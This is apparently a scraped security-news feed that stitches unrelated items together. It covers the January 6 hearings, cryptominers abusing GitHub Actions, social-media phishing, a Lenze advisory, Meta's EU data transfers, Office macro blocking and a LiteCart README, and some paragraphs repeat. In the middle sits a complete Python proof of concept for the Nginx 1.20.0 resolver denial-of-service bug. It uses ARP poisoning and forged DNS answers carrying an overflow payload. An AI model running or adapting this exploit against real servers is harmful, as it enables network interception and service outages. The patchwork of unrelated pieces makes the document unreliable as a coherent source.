The US House committee has already uncovered a more organized and sinister plot than many imagined. But history suggests the worst may be yet to come.

The House committee investigating the January 6 attack never promised a quiet summer, but when hearings started a month ago it certainly seemed like it might be a _quieter_ summer. Many of what were anticipated to be the biggest revelations appeared to have leaked before the hearings began, and the six to eight scheduled public sessions, expected to last only about two hours each, seemed to telegraph modest ambitions—especially in comparison to the 1973 Watergate hearings that stretched for 237 hours, or even the far less consequential 2015 Republican-led Benghazi hearings, where Hillary Clinton alone testified publicly for 11 hours.

But then the hearings began, and with them an emotional and tense multimedia roller coaster, exquisitely produced by former ABC News executive James Goldston to mimic a prestige TV series, in which each “episode” reveals deeper twists and turns and ever more corruption and outrage. Representative Liz Cheney and surprise witness Cassidy Hutchinson, an aide to former chief of staff Mark Meadows, emerged as the summer’s biggest breakout TV stars. 

The testimony so far has proven far more compelling, damning, and reputationally damaging to former president Trump than almost anyone imagined. The committee evidently has the goods and understands how to package them for maximum effect. They are now preparing to return from a brief summer break with two more hearings this week, one on Tuesday and a second prime-time hearing on Thursday.

For 18 months, the tick-tock of the Trump administration’s chaotic build to January 6 has trickled out in news reports, documentaries, and government documents, giving the public a sense of the scope of misdeeds and damage to American democracy. But the events had seemed akin to what the country (and the world) lived through during Trump’s four years as president—a disordered and noisy series of imprudent and haphazard pronouncements, ill-considered tweets, hasty policy choices, and reckless bluster.

Now the country can see otherwise: There was a method to Trump’s madness. The events across the 10 weeks from early November to January 6 were far more organized and sinister than previously known.

Most importantly, the evidence of crimes and criminality has proved inescapable.

In fact, it seems there was a lot of crime in the days and weeks leading up to the riot at the Capitol on January 6—and Trump’s aides seemed to clearly understand that they were headed toward a criminal reckoning. As Hutchinson recounted White House counsel Pat Cipollone telling her, “We’re going to get charged with every crime imaginable if we \[let the President go to the Capitol on January 6.\]”

Altogether, the committee has painted a far more organized and coherent picture of the administration’s efforts than most imagined existed. The hearings have revealed a seven-part coordinated effort by the Trump White House—and the president personally—to weaponize every public, political, and governmental tool at his disposal to hold on to power in the face of a clear and convincing electoral loss. He and a small cadre of loyal aides tried to undermine the legitimacy of Joe Biden’s victory, encouraged states to overturn valid election results, attempted to install election-doubting loyalists at the Justice Department, and applied consistent pressure to Vice President Mike Pence to step outside his constitutional role and reject the electoral college certification. And then—when literally all else failed—Trump encouraged his supporters to flock to the Capitol and stood by—without taking any action to stop them—while they rampaged through the building and came close to harming Pence and lawmakers.

Trump knew what he was doing, was told by aides repeatedly and broadly that it was wrong, and continued his pressure campaign anyway. January 6 wasn’t a spontaneous riot; it was the final attempt at a coup that had failed at every step until then. And the fact that so many of the participants, from members of Congress to, according to Hutchinson, White House chief Mark Meadows himself, apparently sought presidential pardons for their actions in the Trump administration’s final days makes it clear there was what prosecutors call “mens rea,” a guilty mind. In the 18 months since the events at the Capitol, the Justice Department has brought charges against more than 800 people involved in the riots, including eye-opening charges of “seditious conspiracy” against some of the white nationalist militia members, like the Oath Keepers and the Proud Boys, who should figure prominently at this week’s congressional hearings. Precisely none of those yet charged have been within Trump’s inner circle.

That may soon change—and American democracy might very well hinge on whether it does.

While the chair, Representative Bennie Thompson, and vice chair Cheney maintain that their purpose is only to deliver a comprehensive accounting of the events around January 6, the outlines of a whole series of criminal actions are now evident. The technical crimes may feel somewhat obscure—wire fraud, theft of honest services, defrauding the United States, obstruction of justice, obstruction of an official proceeding of Congress—but the fact pattern seems to grow ever more clear. Moreover, the hearing that focused on the White House pressuring elected officials in the state of Georgia brought renewed attention to the possibility that even if the US Justice Department fails to act, state prosecutors might very well decide Donald Trump committed electoral crimes there.

The biggest shift in the national landscape from the January 6 committee, though, seems likely to be ahead of us.

It’s worth remembering too how much the political and factual landscape can change during hearings like this: The biggest revelation of the Watergate hearings—that Nixon had installed a taping system in the White House that would have captured all the key conversations of the conspiracy and cover-up—didn’t emerge until mid-July 1973, weeks into the hearings by Senator Sam Ervin’s Watergate select committee.

Perhaps similarly, there’s a growing sense that the blockbuster nature of the January 6 hearings—and the damaging testimony elicited thus far—is itself compelling further cooperation and testimony. For example, Hutchinson, who had long been represented by a Trump-paid attorney, changed counsel midstream and began cooperating. Friday, Cipollone—who had also resisted testifying—met with committee investigators for nearly eight hours. And the Justice Department announced in a court filing Monday that one of Trump’s attorneys had interviewed with the FBI, as part of Steve Bannon’s related criminal contempt process, testimony that could have wide-ranging implications and itself spur further targets to cooperate. (As part of that filing, the Justice Department rejected Bannon’s weekend public proclamation that he was willing to cooperate with the committee as insincere, saying, “The only thing that has really changed since he refused to comply with the subpoena in October 2021 is that he is finally about to face the consequences of his decision to default.”)

Prosecutors understand this phenomenon well: As evidence of crimes mount, cooperation among the conspirators often spreads. Conspiracies crumble as testimony builds and personal legal and criminal jeopardy rises with it. John Dean, the former White House counsel who originally helped architect the Watergate cover-up before turning states’ witness, became a star witness only after he realized how much—and how clearly—he’d participated in the obstruction of justice.

Other Trump aides seem to be listening to the January 6 hearings and making their own calculations as the committee reconvenes this week. Surely many of them will be uncomfortable with what they hear in the hours and days ahead.

The January 6 Insurrection Hearings Are Just Heating Up

GitHub Actions and Azure virtual machines (VMs) are being leveraged for cloud-based cryptocurrency mining, indicating sustained attempts on the part of malicious actors to target cloud resources for illicit purposes.
"Attackers can abuse the runners or servers provided by GitHub to run an organization's pipelines and automation by maliciously downloading and installing their own cryptocurrency

GitHub Actions and Azure virtual machines (VMs) are being leveraged for cloud-based cryptocurrency mining, indicating sustained attempts on the part of malicious actors to target cloud resources for illicit purposes.

"Attackers can abuse the runners or servers provided by GitHub to run an organization's pipelines and automation by maliciously downloading and installing their own cryptocurrency miners to gain profit easily," Trend Micro researcher Magno Logan said in a report last week.

GitHub Actions (GHAs) is a continuous integration and continuous delivery (CI/CD) platform that allows users to automate the software build, test, and deployment pipeline. Developers can leverage the feature to create workflows that build and test every pull request to a code repository, or deploy merged pull requests to production.

Both Linux and Windows runners are hosted on Standard\_DS2\_v2 virtual machines on Azure and come with two vCPUs and 7GB of memory.

The Japanese company said it identified no fewer than 1,000 repositories and over 550 code samples that are taking advantage of the platform to mine cryptocurrency using the runners provided by GitHub, which has been notified of the issue.

What's more, 11 repositories were found to harbor similar variants of a YAML script containing commands to mine Monero coins, all of which relied on the same wallet, suggesting it's either the handiwork of a single actor or a group working in tandem.

"For as long as the malicious actors only use their own accounts and repositories, end users should have no cause for worry," Logan said. "Problems arise when these GHAs are shared on GitHub Marketplace or used as a dependency for other Actions."

Cryptojacking-oriented groups are known to infiltrate cloud deployments through the exploitation of a security flaw within target systems, such as an unpatched vulnerability, weak credentials, or a misconfigured cloud implementation.

Some of the prominent actors in the illegal cryptocurrency mining landscape include 8220, Keksec (aka Kek Security), Kinsing, Outlaw, and TeamTNT.

The malware toolset is also characterized by the use of kill scripts to terminate and delete competing cryptocurrency miners to best abuse the cloud systems to their own advantage, with Trend Micro calling it a battle "fought for control of the victim's resources."

That said, the deployment of cryptominers, besides incurring infrastructure and energy costs, are also a barometer of poor security hygiene, enabling threat actors to weaponize the initial access gained through a cloud misconfiguration for far more damaging goals such as data exfiltration or ransomware.

"One unique aspect \[...\] is that malicious actor groups do not only have to deal with a target organization's security systems and staff, but they also have to compete with one another for limited resources," the company noted in an earlier report.

"The battle to take and retain control over a victim's servers is a major driving force for the evolution of these groups' tools and techniques, prompting them to constantly improve their ability to remove competitors from compromised systems and, at the same time, resist their own removal."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Cloud-based Cryptocurrency Miners Targeting GitHub Actions and Azure VMs

Nginx version 1.20.0 suffers from a denial of service vulnerability.

    # Exploit Title: Nginx 1.20.0 - Denial of Service (DOS)# Date: 2022-6-29# Exploit Author: Mohammed Alshehri - https://Github.com/M507# Vendor Homepage: https://nginx.org/# Software Link: https://github.com/nginx/nginx/releases/tag/release-1.20.0# Version: 0.6.18 - 1.20.0# Tested on: Ubuntu 18.04.4 LTS bionic # CVE: CVE-2021-23017# The bug was discovered by X41 D-SEC GmbH, Luis Merino, Markus Vervier, Eric Sesterhenn# python3 poc.py --target 172.1.16.100 --dns_server 172.1.16.1# The service needs to be configured to use Nginx resolverfrom scapy.all import *from multiprocessing import Processfrom binascii import hexlify, unhexlifyimport argparse, time, osdef device_setup():    os.system("echo '1' >> /proc/sys/net/ipv4/ip_forward")    os.system("iptables -A FORWARD -p UDP --dport 53 -j DROP")def ARPP(target, dns_server):    print("[*] Sending poisoned ARP packets")    target_mac = getmacbyip(target)    dns_server_mac = getmacbyip(dns_server)    while True:        time.sleep(2)        send(ARP(op=2, pdst=target, psrc=dns_server, hwdst=target_mac),verbose = 0)        send(ARP(op=2, pdst=dns_server, psrc=target, hwdst=dns_server_mac),verbose = 0)def exploit(target):    print("[*] Listening ")    sniff (filter="udp and port 53 and host " + target, prn = process_received_packet)"""RFC schema 0                   1                   2                   3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+|             LENGTH            |               ID              |+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+|Q| OPCODE|A|T|R|R|Z|A|C| RCODE |            QDCOUNT            |+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+|            ANCOUNT            |            NSCOUNT            |+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+|            ARCOUNT            |               QD              |+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+|               AN              |               NS              |+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+|               AR              |+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+Fig. DNS                             """def process_received_packet(received_packet):    if received_packet[IP].src == target_ip:        if received_packet.haslayer(DNS):            if DNSQR in received_packet:                print("[*] the received packet: " + str(bytes_hex(received_packet)))                print("[*] the received DNS request: " + str(bytes_hex(received_packet[DNS].build())))                try:                    # \/    the received DNS request                    dns_request = received_packet[DNS].build()                    null_pointer_index = bytes(received_packet[DNS].build()).find(0x00,12)                    print("[*] debug: dns_request[:null_pointer_index] : "+str(hexlify(dns_request[:null_pointer_index])))                    print("[*] debug: dns_request[null_pointer_index:] : "+str(hexlify(dns_request[null_pointer_index:])))                    payload = [                        dns_request[0:2],                        b"\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00",                        dns_request[12:null_pointer_index+1],                        dns_request[null_pointer_index+1:null_pointer_index+3],                        dns_request[null_pointer_index+3:null_pointer_index+5],                        b"\xC0\x0C\x00\x05\x00\x01\x00\x00\x0E\x10",                        b"\x00\x0B\x18\x41\x41\x41\x41\x41\x41\x41",                        b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41",                        b"\x41\x41\x41\x41\x41\x41\x41\xC0\x04"                    ]                                        payload = b"".join(payload)                    spoofed_pkt = (Ether()/IP(dst=received_packet[IP].src, src=received_packet[IP].dst)/\                        UDP(dport=received_packet[UDP].sport, sport=received_packet[UDP].dport)/\                        payload)                    print("[+] dns answer: "+str(hexlify(payload)))                    print("[+] full packet: " + str(bytes_hex(spoofed_pkt)))                    sendp(spoofed_pkt, count=1)                    print("\n[+] malicious answer was sent")                    print("[+] exploited\n")                except:                    print("\n[-] ERROR")def main():    global target_ip    parser = argparse.ArgumentParser()    parser.add_argument("-t", "--target", help="IP address of the target")    parser.add_argument("-r", "--dns_server", help="IP address of the DNS server used by the target")    args = parser.parse_args()    target_ip = args.target    dns_server_ip = args.dns_server    device_setup()    processes_list = []    ARPPProcess = Process(target=ARPP,args=(target_ip,dns_server_ip))    exploitProcess = Process(target=exploit,args=(target_ip,))    processes_list.append(ARPPProcess)    processes_list.append(exploitProcess)    for process in processes_list:        process.start()    for process in processes_list:        process.join()if __name__ == '__main__':    target_ip = ""    main()

Nginx 1.20.0 Denial Of Service

The Shortcut Macros WordPress plugin through 1.3 does not have authorisation and CSRF checks in place when updating its settings, which could allow any authenticated users, such as subscriber, to update them.

CVE-2022-1956

Scams pressure victims to "resolve an issue that could impact their status, business."

A recent wave of social media phishing schemes doubles down on aggressive scare tactics with phony account-abuse accusations to coerce victims into handing over their login details.

Last week alone, Malwarebytes Labs uncovered two phishing scams, targeting Twitter and Discord (a voice, video, and text chat app). The Twitter phishing scam sends users a direct message (DM) flagging their account for use of hate speech and requesting the user authenticate the account to avoid a suspension. Users are then redirected to a fake "Twitter help center," which asks for the user's login credentials.

The Discord phishing campaign sends users a message from friends or strangers accusing the user of sending explicit photos that are exposed on a server. The message includes a link to the purported server, and if the user wants to follow the link, they are asked to log in via QR code. If they do, the account will most likely be taken over by scammers, according to Malwarebytes. The message then gets sent to the user's friends from his or her account, perpetuating the phishing scam.

Patrick Harr, CEO at SlashNext, an anti-phishing company, says the Twitter and Discord attacks are a clever twist on the traditional social engineering scam to steal credentials. The best social engineering scams use fear or outrage to move the victim to act quickly without taking too much time to think "Is this a phishing scam?," he explains.

"In both cases, the users of Twitter and Discord are motivated to resolve an issue that could impact their status, business, or entertainment, which is why this phish is so effective," he notes.

Social media platforms are perpetual targets of phishing campaigns, using psychological manipulation to encourage victims to disclose confidential login credentials. The pilfered information is then used by malicious actors to hijack the user's social media accounts, or even gain access to their bank accounts.

But more importantly for enterprises, successful social media attacks on their employees can open the door to infiltration to the company network via the user’s infected device or abused credentials. "This means companies need a BYOD strategy that includes multichannel phishing and malware protection to protect social, gaming, and all messaging apps," Harr says.

**Fear and Urgency as Phishing Tools**

James McQuiggan, security awareness advocate at KnowBe4, explains social media phishes are effective because they use fear and urgency to get the victim to take an action they might not otherwise take. "A lot of the time, phishing attacks rely on the victim reacting to the email in an emotional state," he says. "The victim sees the email and responds without adequately checking the sender or the link."

An example is the threat of the social media account being suspended or a notice that the password has expired. When the victim clicks the link and visits the fake website, it looks exactly like the login page, and the user enters their credentials.

And if the user employs multifactor authentication (MFA) with the account, he says, the attacker can copy that session key to bypass the login and automatically gain access before the victim realizes it.

Attackers typically create high-pressure situations to increase their success rates. "If the target doesn't have time to think or feels pressured to act, they will likely overlook any red flags or gut reactions telling them not to engage," says Hank Schless, senior manager of security solutions at Lookout.

In the two incidents involving Discord and Twitter, Schless says, the attackers went for the integrity of the individual. "The public shame associated with hate speech or inappropriate behavior can be enough to get someone to act without thinking," he says.

**Remote Workforce Susceptible to Phishing**

McQuiggan points out remote workers have less in-person interaction with people around them and are less likely to share the experience or event with their co-workers sitting next to them.

"Suppose the organization isn't providing them with equipment from the organization," he says. "In that case, they will certainly be using their own devices and are more relaxed with them at home than with a machine from their organization."

It's not hard for cybercriminals to search LinkedIn or Twitter to see which users work for the public relations, marketing, or communications teams and then work to target them. He says spear-phishing is a top attack vector to get employees to click the links and "open the electronic front door" of the organization.

SlashNext’s Harr says training should include social engineering scams to demonstrate how personal interactions, such as social media interactions, can impact their work life. "However, we hear from customers that making policy adjustments restricting employees' use of mobile, social, or other personal apps is not well-received," he says. "In fact, asking employees to install managed security on their personal devices is also a non-starter."

McQuiggan says additional training is certainly one method of getting users aware of the various social media attacks. "Avoid relying on the links in the email and use it as an alert to check the account," he adds. "Use the application or a browser to log in and verify if an account is wrong or experiencing problems, as mentioned in the phishing email."

Organizations should employ mobile phishing protection across their entire user base — to both corporate-owned and personal devices, Schless recommends.

"Phishing credentials on mobile devices is typically how attackers can gain discreet access to the broader infrastructure and execute more advanced attacks like ransomware," he explains. "Protection against those more advanced attacks requires visibility into how users are accessing apps and data, then how they interact with that data."

**Phishing Attacks Just Won't Die**

Schless is also seeing a recent increase in voice phishing (vishing) and QR code phishing. "There could also be broader use of deepfake technology to impersonate an individual's voice or face in order to make the malicious communication even more convincing," he says.

Harr says social engineering phishing scams continue to be a serious problem for organizations. "We have seen an increase in requests for SMS and messaging protection as business text compromise, like its cousin business email compromise, is becoming a growing problem for an organization to detect and block."

New Phishing Attacks Shame, Scare Victims into Surrendering Twitter, Discord Credentials

It's not a new concept that Office 365, Salesforce, Slack, Google Workspace or Zoom, etc., are amazing for enabling the hybrid workforce and hyper-productivity in businesses today. However, there are three main challenges that have arisen stemming from this evolution: (1) While SaaS apps include a host of native security settings, they need to be hardened by the security team of the organization

It's not a new concept that Office 365, Salesforce, Slack, Google Workspace or Zoom, etc., are amazing for enabling the hybrid workforce and hyper-productivity in businesses today. However, there are three main challenges that have arisen stemming from this evolution: (1) While SaaS apps include a host of native security settings, they need to be hardened by the security team of the organization. (2) Employees are granting 3rd party app access to core SaaS apps that pose potential threats to the company. (3) These SaaS apps are accessed by different devices without their device hygiene score even being checked.

****1 — Misconfiguration Management****

It's not an easy task to have every app setting properly configured — at all times. The challenge lies within how burdensome this responsibility is — each app has tens or hundreds of security settings to configure, in addition to thousands of user roles and permission in a typical enterprise, compounded by the many compliance industry standards and frameworks that organizations strive to follow.

The complexity of securing SaaS apps is only increased by the fact that often the SaaS app owner sits _outside_ the security team, in the department that most uses the app (think Sales has CRM app, Marketing has automation app) — and they are untrained and not focused on the security upkeep of the app. It all amounts to just how burdensome and unrealistic it is to expect security teams to be able to stay in control of the organization's SaaS stack.

****2 — 3rd Party App Access****

OAuth 2.0 has greatly simplified authentication and authorization and offers a fine-grained delegation of access rights. Represented in the form of scopes, an application asks for the user's authorization for specific permissions. An app can request one or more scopes. Through the approval of the scopes, the user grants these apps permissions to execute code to perform logic behind the scenes within their environment. These apps can be harmless or as threatening as an executable file.

When it comes to local machines and executable files, organizations already have control built-in that enables security teams to block problematic programs and files. It needs to be the same when it comes to SaaS apps.

****3 — Device-to-SaaS-User Posture****

From the first entry through to the device posture, security teams need to be able to identify and manage the risks coming from SaaS users and their associated devices. A device with a low hygiene score poses a high risk depending on which apps this employee is using. In the case of a highly privileged user, an unsecured device can pose an even higher level of risk for an organization. The security team needs the ability to correlate SaaS app users, their roles, and permissions with their associated devices' compliance and integrity levels. This end-to-end approach enables a holistic zero-trust approach to SaaS security that is only now coming into the picture.

****SaaS Security Posture Management Handles the SaaS Stack Challenges****

That's why Gartner named SaaS Security Posture Management (SSPM) a MUST HAVE solution to continuously assess security risks and manage the SaaS applications' security posture in the "4 Must-Have Technologies That Made the Gartner Hype Cycle for Cloud Security, 2021." Other cloud solutions don't offer preventative coverage. For example, a CASB solution is event-driven; CASB will alert the organization to a SaaS leak or breach only once it has occurred.

An SSPM solution, like Adaptive Shield, comes into play to enable security teams to identify, analyze, and prioritize misconfigurations as well as provide visibility to 3rd party apps with access to their core apps and Device-to-SaaS-User posture management.

Click here to schedule a 15-minute demo of Adaptive Shield's SSPM solution.

Adaptive Shield lets you filter and slice the data by app, domain, and compliance frameworks.

The core of the solution is the detailed and granular security checks being continuously performed across the SaaS stack, while security teams can address misconfigurations immediately or create a ticket that integrates with any ticketing system:

Through the Activity Monitoring feature, Adaptive Shield monitors the activities of privileged users:

Click here to schedule a 15-minute demo to see all features and functionalities.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

What It Takes to Tackle Your SaaS Security

Multiple Lenze products of the cabinet series skip the password verification upon second login. After a user has been logged on to the device once, a remote attacker can get full access without knowledge of the password.

2022-07-11 12:00 (CEST) VDE-2022-030  

**Lenze: Vulnerability in the OPC-UA authentification connection in the firmware**  
Share: Email | Twitter  

**Published**

2022-07-11 12:00 (CEST)

**Last update**

2022-07-11 12:02 (CEST)

**Product(s)**

Article No°

Product Name

Affected Version(s)

cabinet c520

V01.07.00.2757 < V01.08.01.3021

cabinet c550

V01.07.00.2757 < V01.08.01.3021

cabinet c750

V01.07.00.2757 < V01.08.01.3021

**Summary**

The machine controller of the cabinet series include an OPC-UA server which uses an user management to authenticate clients via anonymous or user/password authentication. If the user/password authentication is selected, password verification is skipped upon second login. As a result, cases occur in which users can establish communication without correct authentication. This vulnerability is not located in the OPC-UA protocol or server, but in the interface to the products firmware.

This Security Advisory is only relevant for the following use cases:

• the user management has been activated on the machine controller (is deactivated by default)

• the OPC-UA Server is used

• Data are transferred via a symbol configuration (is not available by default)

**CVE ID**

**Severity**

**Weakness**

Missing Critical Step in Authentication  (CWE-304) 

**Summary**

Multiple Lenze products of the cabinet series skip the password verification upon second login. After a user has been logged on to the device once, a remote attacker can get full access without knowledge of the password.

**Source**

**Impact**

The exploitation of the missing critical step in authentication may result in unauthorized use of the OPC-UA interface.

**Solution**

**Mitigation**

As part of a security strategy, Lenze SE recommends the following general defense measures to reduce the risk of exploits:

• Only use the products in a protected and controlled environment to minimize network impact and to ensure that they are inaccessible from outside.

• Use external firewalls to protect the automation system network and to separate it from other networks. Remark: One Measure should be to block port 4840 via the external firewall and open this port for authenticated access only.

• Use Virtual Private Networks (VPN) tunnels when remote access is required.

• Use IDS (Intrusion Detection Systems) where possible to detect anomalies in the network.

• Activate and use user administration and password functions.

• Use encrypted communication links.

• Restrict access to both the development tools and their projects and the products of the automation system by physical means, operating system functions, etc.

• Protect the development tool by using the latest virus detection solutions.

• Use of certificate-based communication via the message security modes Sign or Sign&Encrypt and trust of the corresponding client certificates on the machine controller by the OPC-UA server. This can reduce the risk of exploiting this vulnerability.

**Remediation**

Install version V01.08.01.3021, which solves the identified security vulnerability.

**Reported by**

CERT@VDE coordinated with LENZE

CVE-2022-2302: VDE-2022-030 | CERT@VDE

The EU is warning Meta that it needs to make big changes to the way it handles data transfers between the Europe and US.
The post Europe threatens to ban Facebook over data transfers to the US appeared first on Malwarebytes Labs.

If regulators have their way, data transfers from Facebook and Instagram between Europe and the United States could stop this summer. (WhatsApp, another Meta service, will not be affected by the decision as it has a different data controller within Meta.) This could force Meta, Facebook’s parent company, to undergo some radical changes with the way it handles data from Europe, such as setting up local data centers. Otherwise, it will have no choice but to pull out of Europe.

The Irish Data Protection Commission (DPD) sent a draft of its final decision on Thursday to its European counterparts regarding banning Meta from receiving user data from Europe.

A Meta spokesperson told the Telegraph, “This draft decision, which is subject to review by European Data Protection Authorities, relates to a conflict of EU and US law which is in the process of being resolved.”

“We welcome the EU-US agreement for a new legal framework that will allow the continued transfer of data across borders, and we expect this framework will allow us to keep families, communities and economies connected.”

Ireland is the country overseeing Facebook’s data practices as it is Facebook’s legal headquarters in Europe. Any ruling in Ireland would apply to all of Europe.

In 2020, the Court of Justice of the European Union (CJEU) repealed the EU-US Privacy Shield, a legal framework regulating the transatlantic transfer of European data to the US, calling it invalid as it failed to keep European personal data from being excluded from US surveillance. This event is commonly known as the Schrems II case.

However, data from the EU to the US continue to flow. While the CJEU annulled Privacy Shield, it also confirmed the legitimatimacy of the Standard Contractual Clauses (“SCCs”), which Facebook (and other US businesses) used as an alternative to lawfully transfer data from the EU to the US. Should the regulators’ decision become final, Meta will be forced to stop relying on the SCC as well.

“Suspending data transfers would be damaging not only to the millions of people, charities and businesses in the EU who use our services, but also to thousands of other companies who rely on EU-US data transfers to provide a global service,” a Meta spokesperson told SiliconRepublic.com. “A long-term solution on EU-US data transfers is needed to keep people, businesses and economies connected.”

In an interview with The Telegraph, Max Schrems, the privacy campaigner responsible for Privacy Shield getting binned, expected Facebook to use the Irish legal system to delay the implementation of the data transfer ban. He also added that Irish police would need to “physically cut the cords before these transfers actually stop”.

Europe threatens to ban Facebook over data transfers to the US

We waited three decades for macro blocking...and now it's going away again!
The post Microsoft appears to be rolling back Office Macro blocking appeared first on Malwarebytes Labs.

We’re seeing several reports indicating that Microsoft may have rolled back its decision to block Macros in Office. Currently no official statement exists—the reports rely on a post by a Microsoft employee in the replies of the original article where the plan to block macros was announced.

Earlier this year, Microsoft decided to disable macros downloaded from the Internet in five Office apps, by default. Users trying to open files downloaded from the Internet that contained macros would see a message, with a link to an article explaining the block.

> SECURITY RISK: Microsoft has blocked macros from running because the source of this file is untrusted

Malicious macros have been popular with criminals for more than three decades, and the step was welcomed by the security community. However, some users of Microsoft products have queried a surprising change. Dangerous files downloaded from the internet are _not_ being treated as expected in Office.

**The shifting sands of macro blocking**

Bizarrely, we’ve only experienced a few months of no macro worries as people discover the currently changing situation. A recent comment on the article describing the block mentioned that macro blocking has now been removed in Office Current Channel:

> Is it just me or have Microsoft rolled this change back on the Current Channel?
> 
> I was trying to reproduce the pinkish-red ‘Security Risk… Learn More’ notification in the Message Bar, in preparation for demonstrating the new default behaviour for a YouTube video I’m putting together about my company’s macro-enabled toolkit.
> 
> Created a simple .xlsm to show a MsgBox in the open event of the workbook, saved it and uploaded it to cloud storage, deleted it from my local storage, re-downloaded it from cloud storage (to a non-trusted location, my Downloads library)… did not use the Unblock checkbox on the Properties dialog to remove the mark of the web… then opened up the file.
> 
> It first went into Protected View (expected behaviour), but then after I clicked Enable Editing, instead of getting the pink/red message about macros being blocked altogether, I just got the old ‘Security warning…’ message with the ‘Enable Content’ button. The file’s VBA project wasn’t digitally signed, wasn’t saved to a Trusted Location, and still had the mark of the web on it… so macros should have been blocked.

A response came from someone called Angela Robertson, billed as “A Microsoft employee on the Microsoft Tech Community”:

> Based on feedback received, a rollback has started. An update about the rollback is in progress. I apologize for any inconvenience of the rollback starting before the update about the change was made available.

**Waiting for more information**

At the time of writing, we can’t say what this community feedback is or why it’s been so influential in triggering the apparent decision to disable macro blocking. The response in security circles is somewhat less than enthusiastic, and there’s no new information outside of waiting to see what’s contained in the promised “update”.

Indeed, all we have currently is a second Microsoft post which confirms the rollback:

> …based on feedback, we’re rolling back this change from Current Channel production. We appreciate the feedback we’ve received so far, and we’re working to make improvements in this experience. We’ll provide another update when we’re ready to release again to Current Channel. Thank you.

We will update this article as soon as Microsoft clarifies what exactly is going on.

Microsoft appears to be rolling back Office Macro blocking

Cross-site scripting vulnerability in LiteCart versions prior to 2.4.2 allows a remote attacker to inject an arbitrary script via unspecified vectors.

LiteCart is a lightweight e-commerce platform for online merchants. Developed in PHP, HTML 5, and CSS 3.

LiteCart is a registered trademark, property of founder T. Almroth - LiteCart AB.

**How To Install**

For an updated version of the upgrade documentation, visit https://wiki.litecart.net/how\_to\_install

What you need:

*   An Apache2 web server running PHP 5.4 or higher. Latest stable PHP release recommended for best performance.
*   A MySQL 5.5+ account.

If you don't have access to a web server and want to try LiteCart on your local machine, check out AMPPS. AMPPS is an Apache web server suite that offers LiteCart for installation with one click using Softaculous.

**Instructions**

Please note running your own website requires some common sense of web knowledge. If this is not your area of expertise, ask a friend or collegue to assist you.

1.  Connect to your web host via FTP using your favourite FTP software.
    
2.  Transfer the contents of the folder public\_html/ in this archive (yes the contents inside the folder - not the folder itself). Transfer it to your website root directory. Using subdirectories is supported but not recommended.
    
    Example:
    
    /var/www/
    
    /home/username/public\_html/
    
    C:\\xampp\\htdocs\\
    

Paths are machine specific, so talk to your web host if you are uncertain where this folder is.

3.  Point your web browser to the URL of your website followed by the subfolder install/ e.g. http://www.mysite.com/install/. If you placed LiteCart in a subfolder of the web root, the path should be something like http://www.mysite.com/litecart/install. The installation page should now load.
    
4.  Carefully read the instructions on the page. Fill in your details for database, region, etc. Click the Install button when you are ready.
    

If everything went well LiteCart should be successfully installed.

For community written installation instructions see https://wiki.litecart.net/doku.php?id=how\_to\_install.

**How To Get Started**

To get your store up and running, see our step list for best practise.

**How To Change The Look Of Your Store**

Navigate to the folder ~/includes/templates/default.catalog/ and you will find all HTML content and CSS files to edit. If you want to adapt your work with LESS instead of CSS you will need a LESS compiler. We recommend downloading our Developer Kit that has a preconfigured LESS compiler and JavaScript minifyer.

See our wiki article How To Create a Template.

**Links**

*   Official Website
*   GitHub Repository
*   Issue Tracker
*   Community Forums
*   Community Wiki

CVE-2022-27168: GitHub - litecart/litecart: LiteCart is a superfast e-commerce platform. Free for everyone to use. Built with the obession of lightweight using PHP, jQuery HTML 5 and CSS 3.

Tag

#mac